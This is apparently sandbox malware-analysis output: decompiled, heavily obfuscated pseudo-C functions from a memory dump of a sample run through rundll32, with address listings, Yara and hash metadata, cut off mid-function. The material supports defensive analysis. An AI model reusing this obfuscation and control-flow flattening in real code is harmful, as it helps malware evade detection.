				_v1620 = _v1620 + 0xffffd559;
				_v1620 = _v1620 ^ 0x476b0832;
				_v1620 = _v1620 ^ 0x4757dcec;
				_v1660 = 0xdffac8;
				_v1660 = _v1660 | 0xd3f81aab;
				_t341 = 0xd;
				_v1660 = _v1660 / _t341;
				_v1660 = _v1660 + 0x2ca8;
				_v1660 = _v1660 ^ 0x10473906;
				_v1636 = 0xafa95;
				_v1636 = _v1636 | 0x12b9adda;
				_v1636 = _v1636 + 0xca30;
				_t342 = 0x24;
				_v1636 = _v1636 / _t342;
				_v1636 = _v1636 ^ 0x008bc8e6;
				_v1612 = 0xa1b06d;
				_v1612 = _v1612 ^ 0xd927b519;
				_t334 = 0x1c;
				_v1612 = _v1612 / _t334;
				_v1612 = _v1612 ^ 0x07c55aff;
				_v1628 = 0xe475d7;
				_v1628 = _v1628 + 0xf351;
				_v1628 = _v1628 >> 9;
				_v1628 = _v1628 ^ 0x000b149a;
				_v1644 = 0xc98f78;
				_v1644 = _v1644 + 0xa497;
				_v1644 = _v1644 + 0xab0a;
				_v1644 = _v1644 ^ 0x9916dffd;
				_v1644 = _v1644 ^ 0x99d32d23;
				_v1572 = 0xdb2c8b;
				_v1572 = _v1572 ^ 0xa2354bd4;
				_v1572 = _v1572 ^ 0xa2e9b3f6;
				_v1616 = 0x8ac290;
				_v1616 = _v1616 | 0xd6340cba;
				_t343 = 0x17;
				_v1616 = _v1616 / _t343;
				_v1616 = _v1616 ^ 0x095403ec;
				_v1624 = 0xc9b33;
				_v1624 = _v1624 | 0xadec2c36;
				_t344 = 0x23;
				_v1624 = _v1624 / _t344;
				_v1624 = _v1624 ^ 0x04f29945;
				_v1672 = 0xce6284;
				_t345 = 0x1b;
				_v1672 = _v1672 * 0x47;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 | 0xab5418c0;
				_v1672 = _v1672 ^ 0xab589207;
				_v1680 = 0xfb4294;
				_v1680 = _v1680 * 0x56;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000a896c;
				_v1576 = 0xa0fe48;
				_v1576 = _v1576 / _t345;
				_v1576 = _v1576 ^ 0x000b8e8e;
				_v1608 = 0x915f33;
				_v1608 = _v1608 + 0xfa43;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 ^ 0x000a30cc;
				_v1648 = 0x21b71b;
				_v1648 = _v1648 ^ 0x78ef874e;
				_v1648 = _v1648 | 0x9c246086;
				_v1648 = _v1648 * 0x4a;
				_v1648 = _v1648 ^ 0x1ce73be6;
				_v1592 = 0x926794;
				_v1592 = _v1592 + 0xffff6f6e;
				_v1592 = _v1592 ^ 0x009c0ed2;
				_v1656 = 0x919083;
				_v1656 = _v1656 / _t334;
				_v1656 = _v1656 >> 2;
				_t346 = 0x67;
				_v1656 = _v1656 / _t346;
				_v1656 = _v1656 ^ 0x0003c4fa;
				_v1664 = 0xb12839;
				_v1664 = _v1664 ^ 0xbcb8295e;
				_v1664 = _v1664 + 0xe70b;
				_v1664 = _v1664 + 0xffffbcc9;
				_v1664 = _v1664 ^ 0xbc0a928f;
				_v1600 = 0x37ff42;
				_v1600 = _v1600 + 0xffff03fd;
				_v1600 = _v1600 >> 3;
				_v1600 = _v1600 ^ 0x000f4750;
				_v1632 = 0xbb4856;
				_v1632 = _v1632 * 0x4e;
				_v1632 = _v1632 | 0xf74fdfff;
				_v1632 = _v1632 ^ 0xff54b7ec;
				_v1640 = 0x73c8d7;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 << 0xb;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x005dc3ee;
				_v1588 = 0xe2f656;
				_t323 = _v1588 * 0x57;
				_v1588 = _t323;
				_v1588 = _v1588 ^ 0x4d200bca;
				while(_t387 != 0x5de06da) {
					if(_t387 == 0xea1969c) {
						_t387 = 0xfa9128f;
						continue;
					} else {
						_t395 = _t387 - 0xfa9128f;
						if(_t387 != 0xfa9128f) {
							L8:
							__eflags = _t387 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0038DA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
							 *((short*)(E0037B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
							E00378969(_v1620,  &_v520, _t395, _v1660, _v1636);
							_push(_v1644);
							_push(_v1628);
							E003747CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E0038DCF7(_v1612, 0x371328, _t395),  &_v520, _v1672, _v1680);
							E0037A8B0(_v1576, _t329, _v1608);
							_t346 = _v1648;
							_t323 = E0037EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
							_t390 =  &(_t390[0x17]);
							if(_t323 != 0) {
								_t387 = 0x5de06da;
								continue;
							}
						}
					}
					return _t323;
				}
				_push(_v1588);
				_push( &_v1560);
				_push(_t346);
				_push(0);
				_push(0);
				_push(_v1640);
				_t346 = _v1600;
				_push(0);
				_t323 = E0037AB87(_t346, _v1632, __eflags);
				_t390 =  &(_t390[7]);
				_t387 = 0xa8e801c;
				goto L8;
			}



















































                                                                                                                                                            0x00381889
                                                                                                                                                            0x0038188f
                                                                                                                                                            0x003818a1
                                                                                                                                                            0x003818a3
                                                                                                                                                            0x003818aa
                                                                                                                                                            0x003818af
                                                                                                                                                            0x003818b7
                                                                                                                                                            0x003818bc
                                                                                                                                                            0x003818c4
                                                                                                                                                            0x003818cc
                                                                                                                                                            0x003818d0
                                                                                                                                                            0x003818d5
                                                                                                                                                            0x003818db
                                                                                                                                                            0x003818e0
                                                                                                                                                            0x003818e8
                                                                                                                                                            0x003818f0
                                                                                                                                                            0x003818f9
                                                                                                                                                            0x003818fe
                                                                                                                                                            0x00381904
                                                                                                                                                            0x0038190c
                                                                                                                                                            0x00381914
                                                                                                                                                            0x00381920
                                                                                                                                                            0x00381925
                                                                                                                                                            0x0038192b
                                                                                                                                                            0x00381933
                                                                                                                                                            0x0038193b
                                                                                                                                                            0x00381943
                                                                                                                                                            0x0038194b
                                                                                                                                                            0x00381953
                                                                                                                                                            0x00381960
                                                                                                                                                            0x00381963
                                                                                                                                                            0x00381967
                                                                                                                                                            0x0038196f
                                                                                                                                                            0x00381977
                                                                                                                                                            0x0038197f
                                                                                                                                                            0x0038198f
                                                                                                                                                            0x00381993
                                                                                                                                                            0x0038199b
                                                                                                                                                            0x003819a3
                                                                                                                                                            0x003819ab
                                                                                                                                                            0x003819b3
                                                                                                                                                            0x003819bb
                                                                                                                                                            0x003819c3
                                                                                                                                                            0x003819cb
                                                                                                                                                            0x003819d7
                                                                                                                                                            0x003819dc
                                                                                                                                                            0x003819e2
                                                                                                                                                            0x003819ea
                                                                                                                                                            0x003819f2
                                                                                                                                                            0x003819fa
                                                                                                                                                            0x00381a02
                                                                                                                                                            0x00381a0e
                                                                                                                                                            0x00381a11
                                                                                                                                                            0x00381a15
                                                                                                                                                            0x00381a1f
                                                                                                                                                            0x00381a27
                                                                                                                                                            0x00381a35
                                                                                                                                                            0x00381a3a
                                                                                                                                                            0x00381a3e
                                                                                                                                                            0x00381a46
                                                                                                                                                            0x00381a4e
                                                                                                                                                            0x00381a56
                                                                                                                                                            0x00381a5b
                                                                                                                                                            0x00381a63
                                                                                                                                                            0x00381a6b
                                                                                                                                                            0x00381a73
                                                                                                                                                            0x00381a7b
                                                                                                                                                            0x00381a83
                                                                                                                                                            0x00381a8b
                                                                                                                                                            0x00381a93
                                                                                                                                                            0x00381a9b
                                                                                                                                                            0x00381aa3
                                                                                                                                                            0x00381aab
                                                                                                                                                            0x00381ab9
                                                                                                                                                            0x00381abe
                                                                                                                                                            0x00381ac2
                                                                                                                                                            0x00381aca
                                                                                                                                                            0x00381ad2
                                                                                                                                                            0x00381ae0
                                                                                                                                                            0x00381ae5
                                                                                                                                                            0x00381ae9
                                                                                                                                                            0x00381af1
                                                                                                                                                            0x00381b00
                                                                                                                                                            0x00381b01
                                                                                                                                                            0x00381b05
                                                                                                                                                            0x00381b0a
                                                                                                                                                            0x00381b12
                                                                                                                                                            0x00381b1a
                                                                                                                                                            0x00381b27
                                                                                                                                                            0x00381b2b
                                                                                                                                                            0x00381b30
                                                                                                                                                            0x00381b35
                                                                                                                                                            0x00381b3d
                                                                                                                                                            0x00381b4d
                                                                                                                                                            0x00381b51
                                                                                                                                                            0x00381b59
                                                                                                                                                            0x00381b61
                                                                                                                                                            0x00381b69
                                                                                                                                                            0x00381b6e
                                                                                                                                                            0x00381b76
                                                                                                                                                            0x00381b7e
                                                                                                                                                            0x00381b86
                                                                                                                                                            0x00381b93
                                                                                                                                                            0x00381b97
                                                                                                                                                            0x00381b9f
                                                                                                                                                            0x00381ba7
                                                                                                                                                            0x00381baf
                                                                                                                                                            0x00381bb7
                                                                                                                                                            0x00381bc5
                                                                                                                                                            0x00381bc9
                                                                                                                                                            0x00381bd6
                                                                                                                                                            0x00381bde
                                                                                                                                                            0x00381be2
                                                                                                                                                            0x00381bea
                                                                                                                                                            0x00381bf2
                                                                                                                                                            0x00381bfa
                                                                                                                                                            0x00381c02
                                                                                                                                                            0x00381c0a
                                                                                                                                                            0x00381c12
                                                                                                                                                            0x00381c1a
                                                                                                                                                            0x00381c22
                                                                                                                                                            0x00381c27
                                                                                                                                                            0x00381c2f
                                                                                                                                                            0x00381c3c
                                                                                                                                                            0x00381c40
                                                                                                                                                            0x00381c48
                                                                                                                                                            0x00381c50
                                                                                                                                                            0x00381c5d
                                                                                                                                                            0x00381c61
                                                                                                                                                            0x00381c66
                                                                                                                                                            0x00381c6b
                                                                                                                                                            0x00381c73
                                                                                                                                                            0x00381c7b
                                                                                                                                                            0x00381c80
                                                                                                                                                            0x00381c84
                                                                                                                                                            0x00381c8c
                                                                                                                                                            0x00381c9a
                                                                                                                                                            0x00381d93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00381ca0
                                                                                                                                                            0x00381ca0
                                                                                                                                                            0x00381ca6
                                                                                                                                                            0x00381dc6
                                                                                                                                                            0x00381dc6
                                                                                                                                                            0x00381dcc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00381cac
                                                                                                                                                            0x00381cc5
                                                                                                                                                            0x00381cf6
                                                                                                                                                            0x00381cfd
                                                                                                                                                            0x00381d02
                                                                                                                                                            0x00381d0b
                                                                                                                                                            0x00381d4c
                                                                                                                                                            0x00381d5e
                                                                                                                                                            0x00381d7c
                                                                                                                                                            0x00381d80
                                                                                                                                                            0x00381d85
                                                                                                                                                            0x00381d8a
                                                                                                                                                            0x00381d8c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00381d8c
                                                                                                                                                            0x00381d8a
                                                                                                                                                            0x00381ca6
                                                                                                                                                            0x00381ddc
                                                                                                                                                            0x00381ddc
                                                                                                                                                            0x00381d9d
                                                                                                                                                            0x00381da8
                                                                                                                                                            0x00381da9
                                                                                                                                                            0x00381daa
                                                                                                                                                            0x00381dab
                                                                                                                                                            0x00381dac
                                                                                                                                                            0x00381db4
                                                                                                                                                            0x00381db8
                                                                                                                                                            0x00381db9
                                                                                                                                                            0x00381dbe
                                                                                                                                                            0x00381dc1
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )b}$ x
                                                                                                                                                            • API String ID: 0-2724122486
                                                                                                                                                            • Opcode ID: 26bceec668d88352eba14e74d9cf026d227a78793e337ab1cb341a16ad60e48a
                                                                                                                                                            • Instruction ID: 2cfa06008980637177943880aaee6127f5a0c16f072ed00a607fe7f501fa3f8c
                                                                                                                                                            • Opcode Fuzzy Hash: 26bceec668d88352eba14e74d9cf026d227a78793e337ab1cb341a16ad60e48a
                                                                                                                                                            • Instruction Fuzzy Hash: C2D120715083819FE368CF60C48A95BFBF2FBD5358F108A1DF2999A260D7B58949CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038473C Relevance: 2.7, Strings: 2, Instructions: 233COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                            			E0038473C() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				void* _t225;
				void* _t246;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				signed int _t260;
				signed int* _t261;

				_t261 =  &_v100;
				_v12 = 0xf244e3;
				_v8 = 0x291d6d;
				_t225 = 0x37f2dd7;
				_t251 = 0;
				_v4 = 0;
				_v68 = 0x555e8d;
				_v68 = _v68 + 0xfffff532;
				_v68 = _v68 | 0x235b50f0;
				_v68 = _v68 ^ 0x235e53ff;
				_v84 = 0xf72ec;
				_v84 = _v84 >> 7;
				_t252 = 0x19;
				_v84 = _v84 / _t252;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000f09df;
				_v20 = 0xee8389;
				_t253 = 0x51;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x2635dc09;
				_v88 = 0xea545e;
				_t30 =  &_v88; // 0xea545e
				_v88 =  *_t30 / _t253;
				_t36 =  &_v88; // 0xea545e
				_t254 = 0x7a;
				_v88 =  *_t36 * 0x1c;
				_v88 = _v88 + 0xc9a8;
				_v88 = _v88 ^ 0x005db592;
				_v24 = 0x448750;
				_v24 = _v24 / _t254;
				_v24 = _v24 ^ 0x000cab3c;
				_v28 = 0x8cea36;
				_v28 = _v28 * 0x38;
				_v28 = _v28 ^ 0x1eda9ad9;
				_v100 = 0x8110ba;
				_v100 = _v100 + 0x3ab9;
				_v100 = _v100 ^ 0x336ca884;
				_v100 = _v100 + 0xffff8c66;
				_v100 = _v100 ^ 0x33e0711c;
				_v64 = 0x5ca85e;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x000b11ab;
				_v44 = 0x2bb2b6;
				_v44 = _v44 | 0xbbfbcd5f;
				_v44 = _v44 ^ 0xbbf16182;
				_v72 = 0x855f4c;
				_v72 = _v72 ^ 0x87656771;
				_v72 = _v72 * 0x71;
				_v72 = _v72 ^ 0xf9f8e59a;
				_v96 = 0x938339;
				_v96 = _v96 << 8;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xcc040e17;
				_v96 = _v96 ^ 0x50841052;
				_v40 = 0xbe1d32;
				_v40 = _v40 + 0x9b9c;
				_v40 = _v40 ^ 0x00bc2d0e;
				_v56 = 0x9e5686;
				_v56 = _v56 + 0xffffd134;
				_v56 = _v56 + 0xffff1440;
				_v56 = _v56 ^ 0x0091c9b6;
				_v60 = 0xb7e614;
				_v60 = _v60 << 3;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00065aea;
				_v32 = 0x537989;
				_v32 = _v32 + 0xffff7fce;
				_v32 = _v32 ^ 0x005430a6;
				_v92 = 0x1586eb;
				_t255 = 0x27;
				_v92 = _v92 * 0x18;
				_v92 = _v92 >> 7;
				_v92 = _v92 * 0x26;
				_v92 = _v92 ^ 0x009f543a;
				_v52 = 0xc32f0b;
				_v52 = _v52 | 0xcd8d244f;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0cd427c3;
				_v36 = 0xd9cf6a;
				_v36 = _v36 / _t255;
				_v36 = _v36 ^ 0x000f5a1a;
				_v16 = 0xbb623f;
				_v16 = _v16 ^ 0xe760556d;
				_v16 = _v16 ^ 0xe7dfff62;
				_v76 = 0x7fa35c;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 + 0xffff049d;
				_v76 = _v76 ^ 0x38c60922;
				_v76 = _v76 ^ 0xc73f93c8;
				_v80 = 0x34ea16;
				_v80 = _v80 | 0x70dfffff;
				_t256 = 0x78;
				_t257 = _v16;
				_t260 = _v16;
				_t224 = _v16;
				_v80 = _v80 / _t256;
				_v80 = _v80 ^ 0x00f0b2be;
				_v48 = 0x2ab377;
				_v48 = _v48 << 0xd;
				_v48 = _v48 + 0x21bb;
				_v48 = _v48 ^ 0x5663e2ae;
				while(1) {
					L1:
					_push(0x5c);
					while(_t225 != 0xb8820d) {
						if(_t225 == 0x1effdba) {
							_t219 = E0037912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
							_t224 = _t219;
							_t261 =  &(_t261[5]);
							if(_t219 != 0) {
								_t225 = 0xb9a00d9;
								goto L11;
							}
						} else {
							if(_t225 == 0x37f2dd7) {
								_t225 = 0x43cb3ac;
								continue;
							} else {
								if(_t225 == 0x43cb3ac) {
									_t258 =  *0x393e10; // 0x0
									_t259 = _t258 + 0x1c;
									while( *_t259 != _t246) {
										_t259 = _t259 + 2;
									}
									_t257 = _t259 + 2;
									_t225 = 0x1effdba;
									goto L12;
								} else {
									if(_t225 == 0x5d9bea5) {
										E00388F9E(_v32, _v92, _v52, _v36, _t260);
										_t261 =  &(_t261[3]);
										_t225 = 0xb8820d;
										goto L11;
									} else {
										if(_t225 == _t218) {
											E0037E249(_v96, _t260, _v40, _v56, _v60);
											_t261 =  &(_t261[3]);
											_t251 =  !=  ? 1 : _t251;
											_t225 = 0x5d9bea5;
											L11:
											_t246 = 0x5c;
											L12:
											_t218 = 0x9850ebe;
											continue;
										} else {
											if(_t225 != 0xb9a00d9) {
												L22:
												if(_t225 != 0x8a80d0f) {
													continue;
												}
											} else {
												_t260 = E003742C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
												_t261 =  &(_t261[5]);
												_t218 = 0x9850ebe;
												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t251;
					}
					E00388F9E(_v16, _v76, _v80, _v48, _t224);
					_t261 =  &(_t261[3]);
					_t225 = 0x8a80d0f;
					_t218 = 0x9850ebe;
					_t246 = 0x5c;
					goto L22;
				}
			}











































                                                                                                                                                            0x0038473c
                                                                                                                                                            0x0038473f
                                                                                                                                                            0x00384749
                                                                                                                                                            0x00384751
                                                                                                                                                            0x0038475a
                                                                                                                                                            0x0038475c
                                                                                                                                                            0x00384760
                                                                                                                                                            0x00384768
                                                                                                                                                            0x00384770
                                                                                                                                                            0x00384778
                                                                                                                                                            0x00384780
                                                                                                                                                            0x00384788
                                                                                                                                                            0x00384793
                                                                                                                                                            0x00384798
                                                                                                                                                            0x0038479e
                                                                                                                                                            0x003847a3
                                                                                                                                                            0x003847ab
                                                                                                                                                            0x003847b8
                                                                                                                                                            0x003847bb
                                                                                                                                                            0x003847bf
                                                                                                                                                            0x003847c7
                                                                                                                                                            0x003847cf
                                                                                                                                                            0x003847d7
                                                                                                                                                            0x003847db
                                                                                                                                                            0x003847e0
                                                                                                                                                            0x003847e1
                                                                                                                                                            0x003847e5
                                                                                                                                                            0x003847ed
                                                                                                                                                            0x003847f5
                                                                                                                                                            0x00384803
                                                                                                                                                            0x00384807
                                                                                                                                                            0x0038480f
                                                                                                                                                            0x0038481c
                                                                                                                                                            0x00384820
                                                                                                                                                            0x00384828
                                                                                                                                                            0x00384830
                                                                                                                                                            0x00384838
                                                                                                                                                            0x00384840
                                                                                                                                                            0x00384848
                                                                                                                                                            0x00384850
                                                                                                                                                            0x00384858
                                                                                                                                                            0x00384862
                                                                                                                                                            0x00384866
                                                                                                                                                            0x0038486e
                                                                                                                                                            0x00384876
                                                                                                                                                            0x0038487e
                                                                                                                                                            0x00384886
                                                                                                                                                            0x0038488e
                                                                                                                                                            0x0038489b
                                                                                                                                                            0x0038489f
                                                                                                                                                            0x003848a7
                                                                                                                                                            0x003848af
                                                                                                                                                            0x003848b4
                                                                                                                                                            0x003848b9
                                                                                                                                                            0x003848c1
                                                                                                                                                            0x003848c9
                                                                                                                                                            0x003848d1
                                                                                                                                                            0x003848d9
                                                                                                                                                            0x003848e1
                                                                                                                                                            0x003848e9
                                                                                                                                                            0x003848f1
                                                                                                                                                            0x003848f9
                                                                                                                                                            0x00384901
                                                                                                                                                            0x00384909
                                                                                                                                                            0x00384910
                                                                                                                                                            0x00384915
                                                                                                                                                            0x0038491d
                                                                                                                                                            0x00384925
                                                                                                                                                            0x0038492d
                                                                                                                                                            0x00384935
                                                                                                                                                            0x00384944
                                                                                                                                                            0x00384947
                                                                                                                                                            0x0038494b
                                                                                                                                                            0x00384955
                                                                                                                                                            0x00384959
                                                                                                                                                            0x00384961
                                                                                                                                                            0x00384969
                                                                                                                                                            0x00384971
                                                                                                                                                            0x00384976
                                                                                                                                                            0x0038497e
                                                                                                                                                            0x0038498e
                                                                                                                                                            0x00384992
                                                                                                                                                            0x0038499a
                                                                                                                                                            0x003849a2
                                                                                                                                                            0x003849aa
                                                                                                                                                            0x003849b2
                                                                                                                                                            0x003849ba
                                                                                                                                                            0x003849bf
                                                                                                                                                            0x003849c7
                                                                                                                                                            0x003849cf
                                                                                                                                                            0x003849d7
                                                                                                                                                            0x003849df
                                                                                                                                                            0x003849eb
                                                                                                                                                            0x003849ee
                                                                                                                                                            0x003849f2
                                                                                                                                                            0x003849f6
                                                                                                                                                            0x003849fa
                                                                                                                                                            0x00384a03
                                                                                                                                                            0x00384a0b
                                                                                                                                                            0x00384a13
                                                                                                                                                            0x00384a18
                                                                                                                                                            0x00384a20
                                                                                                                                                            0x00384a28
                                                                                                                                                            0x00384a28
                                                                                                                                                            0x00384a28
                                                                                                                                                            0x00384a2b
                                                                                                                                                            0x00384a3d
                                                                                                                                                            0x00384b36
                                                                                                                                                            0x00384b3b
                                                                                                                                                            0x00384b3d
                                                                                                                                                            0x00384b42
                                                                                                                                                            0x00384b44
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384b44
                                                                                                                                                            0x00384a43
                                                                                                                                                            0x00384a49
                                                                                                                                                            0x00384b16
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384a4f
                                                                                                                                                            0x00384a55
                                                                                                                                                            0x00384af9
                                                                                                                                                            0x00384aff
                                                                                                                                                            0x00384b07
                                                                                                                                                            0x00384b04
                                                                                                                                                            0x00384b04
                                                                                                                                                            0x00384b0c
                                                                                                                                                            0x00384b0f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384a5b
                                                                                                                                                            0x00384a61
                                                                                                                                                            0x00384aea
                                                                                                                                                            0x00384aef
                                                                                                                                                            0x00384af2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384a63
                                                                                                                                                            0x00384a65
                                                                                                                                                            0x00384ab7
                                                                                                                                                            0x00384abe
                                                                                                                                                            0x00384ac4
                                                                                                                                                            0x00384ac7
                                                                                                                                                            0x00384acc
                                                                                                                                                            0x00384ace
                                                                                                                                                            0x00384acf
                                                                                                                                                            0x00384acf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384a67
                                                                                                                                                            0x00384a6d
                                                                                                                                                            0x00384b71
                                                                                                                                                            0x00384b77
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384a73
                                                                                                                                                            0x00384a8f
                                                                                                                                                            0x00384a91
                                                                                                                                                            0x00384a9b
                                                                                                                                                            0x00384aa0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384aa0
                                                                                                                                                            0x00384a6d
                                                                                                                                                            0x00384a65
                                                                                                                                                            0x00384a61
                                                                                                                                                            0x00384a55
                                                                                                                                                            0x00384a49
                                                                                                                                                            0x00384b86
                                                                                                                                                            0x00384b86
                                                                                                                                                            0x00384b5c
                                                                                                                                                            0x00384b61
                                                                                                                                                            0x00384b64
                                                                                                                                                            0x00384b69
                                                                                                                                                            0x00384b70
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384b70

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ^T$mU`
                                                                                                                                                            • API String ID: 0-1245783925
                                                                                                                                                            • Opcode ID: 0858fbecb8954338dccd4e191a9219fdc4a00f79219838bb988fffa924650912
                                                                                                                                                            • Instruction ID: 0ee17e8be298a2f5944489620d213329c214832f339cb002675026f1d2433b76
                                                                                                                                                            • Opcode Fuzzy Hash: 0858fbecb8954338dccd4e191a9219fdc4a00f79219838bb988fffa924650912
                                                                                                                                                            • Instruction Fuzzy Hash: A4B140715083419FC319DF25898A41BFBE1FBC8748F108A1DF69A9A260D3B5CA09CF82
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038A666 Relevance: 2.7, Strings: 2, Instructions: 214COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E0038A666(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t185;
				void* _t187;
				signed int _t194;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				signed int _t239;
				signed int* _t240;

				_t204 = __ecx;
				_t240 =  &_v208;
				_v144 = __ecx;
				_v188 = 0x57b051;
				_v188 = _v188 ^ 0x0e33ee27;
				_v188 = _v188 * 0x1d;
				_t236 = 0xac5721c;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x15e508b7;
				_v156 = 0xb3c586;
				_v156 = _v156 + 0xc4f5;
				_v156 = _v156 ^ 0x00bed25a;
				_v168 = 0x711032;
				_v168 = _v168 << 8;
				_v168 = _v168 + 0x5169;
				_v168 = _v168 ^ 0x711dace8;
				_v192 = 0xa2549d;
				_v192 = _v192 + 0x52ae;
				_v192 = _v192 >> 1;
				_v192 = _v192 >> 3;
				_v192 = _v192 ^ 0x000eb53b;
				_v140 = 0xe7e5a1;
				_t231 = 0x32;
				_v140 = _v140 * 0x50;
				_v140 = _v140 ^ 0x4874e895;
				_v208 = 0x1967bb;
				_v208 = _v208 << 4;
				_v208 = _v208 | 0x201d9a42;
				_v208 = _v208 / _t231;
				_v208 = _v208 ^ 0x00a7f54f;
				_v152 = 0x52a7fc;
				_v152 = _v152 + 0x45a2;
				_v152 = _v152 ^ 0x0052edd3;
				_v160 = 0x3027b3;
				_v160 = _v160 + 0xfd14;
				_v160 = _v160 ^ 0x0036c553;
				_v180 = 0x38862e;
				_v180 = _v180 ^ 0x0f350481;
				_t232 = 0x7c;
				_v180 = _v180 * 0x65;
				_v180 = _v180 ^ 0xf053ee57;
				_v136 = 0x356a19;
				_v136 = _v136 ^ 0xbed63dcb;
				_v136 = _v136 ^ 0xbeeb3706;
				_v164 = 0x14aaf;
				_v164 = _v164 + 0xffffc1af;
				_v164 = _v164 ^ 0x000285a1;
				_v200 = 0x7f3e04;
				_v200 = _v200 * 0x53;
				_v200 = _v200 + 0xffffdc1b;
				_v200 = _v200 + 0x69f9;
				_v200 = _v200 ^ 0x2945b47b;
				_v148 = 0xc6ed1e;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0006dab0;
				_v172 = 0x6d07b9;
				_v172 = _v172 / _t232;
				_t233 = 0x35;
				_v172 = _v172 / _t233;
				_v172 = _v172 ^ 0x00041e3e;
				_v204 = 0x57aab;
				_v204 = _v204 + 0xdcdc;
				_v204 = _v204 * 0x48;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0xc89fb5e3;
				_v132 = 0xff84eb;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0x1ff23c26;
				_v196 = 0xcb0ee1;
				_v196 = _v196 | 0xd8d8bfc1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x8dbe7284;
				_v184 = 0x3f345e;
				_t234 = 0x7b;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x1738d684;
				_v176 = 0x75d12f;
				_t239 = _v184;
				_t203 = _v184;
				_t235 = _v184;
				_v176 = _v176 / _t234;
